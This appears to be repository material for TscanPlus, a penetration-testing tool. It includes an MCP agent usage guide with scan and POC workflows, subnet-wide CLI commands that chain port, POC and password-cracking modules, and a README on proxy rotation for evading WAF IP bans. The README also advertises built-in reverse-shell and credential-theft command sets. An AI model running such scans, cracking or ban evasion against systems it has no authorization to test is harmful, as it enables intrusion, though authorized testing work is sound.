smart_scan: false
thread: "200"
```
**CLI** `TscanPlus -m port -h 10.0.0.0/16 -p 80,443 -nosmart`
---
## 十、项目管理
### 示例 10-1:默认 MCP 项目(每次清空)
未传 `project` 时自动使用 `MCP` 并在调用前清空,适合一次性对话扫描。
### 示例 10-2:命名项目、累积结果
```yaml
tool: subdomain_scan
domains: "example.com"
project: pentest-acme
# fresh_project 默认 false → 追加
```
### 示例 10-3:清空后重扫
```yaml
tool: ip_scan
target: "10.0.0.0/24"
ports: "Top100"
project: pentest-acme
fresh_project: true
```
### 示例 10-4:综合项目登记
```yaml
tool: tscan_scan
targets: "192.168.1.0/24"
modules: "port,url,poc"
project: pentest-acme
fresh_project: true
```
` tscan_scan` 会在 GUI `project` 表登记;单工具可能仅写分表。
---
## 十一、分阶段工作流(推荐 Agent 策略)
### 工作流 AIP → Web → 漏洞
1. `ip_scan``ports: "80,443,8080,8443"`
2.`results.ipscan` 提取 `target` URL
3. `url_scan``finger: tiny`
4. 用户确认后 `poc_scan``tscan_scan``poc` 模块
### 工作流 B:子域资产扩张
1. `subdomain_scan` + `sub_api: true`
2. `tscan_scan``modules: "port,url"``targets` 为子域列表
3. 对高危 URL 单独 `poc_scan`
### 工作流 C:测绘驱动
1. `cyber_search` 获取 IP/域名
2. 向用户展示摘要,确认范围
3. `ip_scan` / `url_scan` 分批执行(控制 `result_limit`
---
## 十二、拒绝未授权扫描
**用户:** 扫一下 https://www.baidu.com 有没有漏洞。
**Agent 应:**
说明无法对未授权的第三方生产站点执行扫描;可改为在用户自有 lab 靶机上演示 `poc_scan` 参数与返回结构,不进行真实请求。
---
## 十三、返回 JSON 结构参考
```json
{
"success": true,
"message": "ip_scan completed",
"data": {
"project": "MCP",
"project_cleared": true,
"target": "10.211.55.2",
"ports": "80,443,8080",
"result_limit": 200,
"counts": { "ipscan": 3, "urlscan": 1, "poccheck": 0 },
"results": {
"ipscan": [
{
"host": "10.211.55.2",
"port": "8083",
"target": "http://10.211.55.2:8083",
"title": "..."
}
],
"urlscan": [],
"poccheck": []
}
}
}
```
**各表关键字段(汇报时优先提取):**
| 表名 | 字段 |
|------|------|
| `ipscan` | `host`, `port`, `target`, `title`, `banner` |
| `urlscan` | `target`, `title`, `finger`, `status` |
| `poccheck` | `target`, `poc_vul`, `level`, `request` |
| `pwdcrack` | `host`, `port`, `service`, `user`, `pass` |
| `dirscan` | `url`, `path`, `status`, `len` |
| `jsfinder` | `url`, `match`, `type` |
| `subdomain` | `domain`, `subdomain`, `ips` |
| `cyber` | `ip`, `domain`, `port`, `title`, `source` |
---
## 十四、CLI 批量对照(无 MCP 时)
```bash
# C 段全面(慎用范围)
TscanPlus -h 192.168.1.0/24 -m port,url,poc,crack
# URL 文件
TscanPlus -uf target-urls.txt -m url,poc,dir,js
# 全功能(lab 仅限)
TscanPlus -h 192.168.1.0/24 -d example.com -m port,url,poc,crack,dir,js,domain,cyber
# 指定项目
TscanPlus -pr MyProject -m port,url,poc -h 192.168.1.1
```
Agent 在 MCP 可用时应优先调用工具并解析 JSON,CLI 仅作备选说明。
+14
View File
@@ -0,0 +1,14 @@
{
"mcpServers": {
"tscanplus-stdio": {
"command": "/绝对路径/TscanPlus",
"args": ["mcp", "stdio"]
},
"tscanplus-http": {
"url": "http://127.0.0.1:8088/mcp"
},
"tscanplus-sse-legacy": {
"url": "http://127.0.0.1:8088/sse"
}
}
}
File diff suppressed because it is too large Load Diff
+159
View File
@@ -0,0 +1,159 @@
<div align=center><img src=images/TscanPlus.png width=50% ></div>
## 无影v2.6.5—代理池管理功能上线
无影(TscanPlus),一款综合性网络安全检测和运维工具,旨在快速资产发现、识别、检测,构建基础资产信息库,协助甲方安全团队或者安全运维人员有效侦察和检索资产,发现存在的薄弱点和攻击面。
**【主要功能】** 端口探测、服务识别、URL指纹识别、POC验证、弱口令猜解、目录扫描、域名探测、网络空探等。
**【辅助功能】** 编码解码、加密解密、CS上线、反弹shell、杀软查询、提权辅助、常用命令、字典生成等。
**TscanPlus 功能介绍可参考文章:《TscanPlus——一款红队自动化工具》https://mp.weixin.qq.com/s/vYB03ckGqeyDrOVVWFWkBA**
### 1、代理池的作用
在网络安全测试和渗透测试工作中,维护一个高质量高便利的代理池是非常关键的一环。随着目标系统安全防护能力的不断提升,常见的安全防护措施如IP封禁、流量监控、频率限制等,给测试工作带来了诸多挑战。特别是在大规模资产探测、爬取敏感信息以及进行弱点扫描时,如果使用单一IP地址,往往会因为频繁请求而触发防护策略,导致测试无法深入开展,甚至可能暴露测试行为。
基于此,无影新开发了代理池管理功能模块,通过多种代理录入、多种场景切换、多种协议支持、自动验证和删除等功能,为安全测试人员提供了更便捷的代理池管理功能。
### 2、代理池功能介绍
代理池目前主要包括:添加代理、自动爬取代理、代理场景切换、代理验证、代理Listener管理等功能。
在开启代理Listener后,可配合不同代理切换模式,轮训、遍历代理池中的所有可用代理,提供代理给无影或其他外部应用进行使用。
<div align=center><img src=images/image-20241225095955306.png width=80% ></div>
#### 2.1 添加代理
添加代理包括三种方式:单个添加、批量添加、自动爬取
1、单个添加只需要选择代理类型,IP、端口、认证账号密码登信息,手工录入即可。
2、批量录入支持多协议、账号密码认证等格式批量导入。
```
每行一个代理地址,格式为 type://user:pass@ip:port,例如:
http://127.0.0.1:8081、socks5://127.0.0.1:1080
代理如需要账号密码认证,请使用:
http://user:pass@127.0.0.1:8081、socks5://user:pass@127.0.0.1:1080
```
<div align=center><img src=images/image-20241225100558973.png width=80% ></div>
3、自动爬取功能支持从Fofa、Quake、Hunter三个空间探测平台上根据查询语法抓取免费代理。
配置好启用的API平台,设置抓取上限数量和查询语法即可进行抓取。(注意:key需要在空间测绘API配置中修改)
不过免费代理的质量一般不高,所以使用时要慎重。
<div align=center><img src=images/image-20241225101001612.png width=80% ></div>
爬取成功后提示:
<div align=center><img src=images/image-20241225101252184.png width=80% ></div>
<div align=center><img src=images/image-20241225101713314.png width=80% ></div>
#### 2.3 代理Listener管理
代理Listener是使用无影开启一个本地代理端口,这样无影或其他软件均可配置该代理地址来共同使用代理池。
开启代理Listener前需要先配置代理监听信息,如代理监听IP、端口、协议、账号密码等。
代理协议可以选HTTP或SOCKS5,但需要注意:
1、HTTP类型代理:可使用代理池中所有协议的代理,包括HTTP或Socks5,但HTTP类型只能用来代理web协议,也就是没法用HTTP代理来进行端口扫描或域名枚举等。
2、Socks5类型代理:只能使用代理池中的Socks5代理,无法使用代理池中的HTTP类型代理,但Socks5类型代理可用来扫描端口。
建议根据使用场景选用不同代理类型代理。
<div align=center><img src=images/image-20241225104539969.png width=80% ></div>
配置好代理后可以直接启动,也可先把所有代理校验后再启动,这样校验失败的代理就不会消耗资源了。
<div align=center><img src=images/image-20241225105104144.png width=80% ></div>
#### 2.3 代理管理与验证
在代理池中添加了代理后,可对代理进行单个或批量的有效性验证,设置合适的验证网站和关键词即可,如果是纯内网代理也可设置内网验证地址。
如果启用了“删除无效代理”功能,那么会对已有代理进行检测,累计三次无效后自动删除该代理。
另外,可以对单个代理进行单独的编辑、验证、启用或禁用、删除等操作。如果代理被禁用或延时<0,那么不管哪种场景切换都不用使用该代理。
另外,可以在“延时”列单击两次,可对代理池根据延时进行排序。延时中显示-1的为代理访问失败,每失败次数+1,延时会-1。
<div align=center><img src=images/image-20241225102225192.png width=80% ></div>
#### 2.4 代理场景切换
无影的代理池管理功能根据渗透测试常见场景设计了五种切换模式:
- 1、轮询代理模式:从代理池中依次抽选延时最小的代理,当代理无效时自动切换下一个,依次轮询。
- 2、根据次数更换:设定一个代理最多使用次数,比如10次,那么每个代理IP地址在使用10次后会自动切换下一个。比如有些waf可能会拦截10次攻击后就会封ip,那么可以使用这种模式来规避IP封禁。
- 3、根据时间更换:设定一个代理最长使用时间,比如3分钟,那么每个代理IP地址在使用3分钟后会自动切换下一个。
- 4、根据场景:在“代理验证”中配置合适的验证网站,当验证失败时切换下个代理。比如该网站有waf,但不确定什么时候会封ip,那么可以使用该模式,IP被封后会自动切换下一个代理。
- 5、固定代理:每次固定使用延时最短的代理地址,不切换IP,适用于代理质量比较高或代理较少的情况。
另外,在启动代理Listener后,如果切换代理模式,那么新模式会马上生效,无需重启Listener,当没有可用代理时会自动关闭Listener。
<div align=center><img src=images/image-20241225102843389.png width=80% ></div>
#### 2.5 实战使用
以“根据次数更换”场景为例,同时设置1次更换。在开启了代理Listener后,在浏览器中配置该代理,之后每次访问`http://myip.ipip.net/`都可发现使用了不同的代理地址。
https://github.com/user-attachments/assets/2a5f1fc4-c069-44df-befe-a2ddfd78089e
我们在云VPS上开启了一个web服务,同时启用了waf功能,当请求频率较高或有攻击行为时就会封ip三分钟。
<div align=center><img src=images/image-20241225142243669.png width=60% ></div>
基于场景的代理切换模式下,可以在IP被封后自动切换IP地址。
https://github.com/user-attachments/assets/8b644021-51ae-4bed-9f52-5db8e4c44f66
### 3、其他已有功能
**【特色功能】**
1、内置5.2W余条指纹数据,对1万个web系统进行指纹识别仅需8-10分钟,在效率和指纹覆盖面方面应该是目前较高的了。
2、在指纹探测结果中,对130多个红队常见CMS和框架、Poc可关联CMS进行了自动标注。内置大量高质量Poc,并可外接Nuclei、Afrog、Xray等Poc工具,可实现指纹和Poc的联动,根据指纹识别的结果自动关联Poc,并可直接查看poc数据包相关信息。
3、在创建IP端口扫描、Url扫描时,可关联Poc检测、密码破解、目录扫描等功能,发现匹配的服务或产品时会自动触发密码破解或poc检测。
4、内置34种常见服务的弱口令破解,可方便管理员对内网弱口令进行排查,为提高检测效率,优选并精简每个服务的用户名和密码字典。覆盖的服务包括:SSH,RDP,SMB,MYSQL,SQLServer,Oracle,MongoDB,Redis,PostgreSQL,MemCached,Elasticsearch,FTP,Telnet,WinRM,VNC,SVN,Tomcat,WebLogic,Jboss,Zookeeper,Socks5,SNMP,WMI,LDAP,LDAPS,SMTP,POP3,IMAP,SMTP_SSL,IMAP_SSL,POP3_SSL,RouterOS,WebBasicAuth,Webdav,CobaltStrike等。
5、实现了编码解码、哈希计算、加密解密、国密算法、数据格式化、其他转换等共36种类型,其中编码解码类8种、哈希计算13种、加密解密9种、国密算法3种、数据格式化9种、其他2种。包含了AES、RSA、SM2、SM4、DES、3DES、Xor、RC4、Rabbit、Base64、Base32、URL、ASCII、各进制转换、字符串与进制转换、HTML、Unicode、MD5、Hmac、SM3、SHA1、SHA2、SHA3、NTLM、JSON格式化与压缩、XML格式化与压缩、IP地址与整数互转、String.fromCharCode、Unix时间戳互转、文本去除重复行、字母大小写、生成各类随机字符串、字符串反转、JWT解析与弱密码、一键解密OA等。
6、目录枚举默认使用HEAD方式,可对并发、超时、过滤、字典等进行自定义,内置了DirSearch的字典,可导入自己的字典文件,也可用内置字典fuzz工具进行生成。
7、内置各类反弹shell命令85条、Win内网(凭证获取、权限维持、横向移动)命令26类、Linux内网命令18类、下载命令31条、MSF生成命令21条、CS免杀上线命令等,可根据shell类型、操作系统类型、监听类型自动生成代码。
8、灵活的代理设置,可一键设置全局代理,也可以各模块单独开启代理功能,支持HTTP(S)/SOCKS5两种代理,支持身份认证。
9、快速的子域名探测,域名可联动其他子功能,可配置key后对接多个网络空间探测平台,一键查询去重。
10、内置资产分拣、JsFinder、Host碰撞、Jwt秘钥破解、IP查询、Windows提权辅助、杀软查询、shiro解密等各类工具。
TscanPlus 更多其他功能介绍可参考文章:《TscanPlus——一款红队自动化工具》https://mp.weixin.qq.com/s/vYB03ckGqeyDrOVVWFWkBA
### 4、软件下载
Github下载:https://github.com/TideSec/Tscanplus/releases
部分功能还在完善,目前暂不提供源码,这里打包了windows/mac版本的TscanPlus供下载。
本次编译的均为x64_AMD架构,有需要x86版本或ARM版的可到星球下载。